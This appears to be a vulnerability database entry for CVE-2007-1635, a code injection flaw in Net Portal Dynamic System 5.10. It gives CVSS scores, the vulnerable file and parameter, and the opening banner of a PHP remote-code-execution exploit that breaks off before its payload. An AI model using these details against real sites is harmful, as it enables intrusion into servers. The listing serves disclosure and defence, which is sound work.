9
CVSSv2

CVE-2007-1635

Published: 23/03/2007 Updated: 16/10/2018
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
VMScore: 905
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Static code injection vulnerability in admin/settings.php in Net Portal Dynamic System (NPDS) 5.10 and previous versions allows remote authenticated users to inject arbitrary PHP code via the xtop parameter in a "ConfigSave" op to admin.php, which can later be accessed via a "Configure" op to admin.php.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

net portal dynamic system net portal dynamic system

Exploits

#!/usr/bin/php <?php error_reporting(E_ALL ^ E_NOTICE); # Advisory soon if($argc < 3) { print(" TITLE | Net Portal Dynamic System (NPDS) <= 510 Remote Code Execution 0day AUTHOR | DarkFig \/ wwwacid-rootnewfr \/ gmdarkfig@gmailcom NOTE | Works regardless of php settings USAGE | $argv[0] -url <url> [Options] OPTIO ...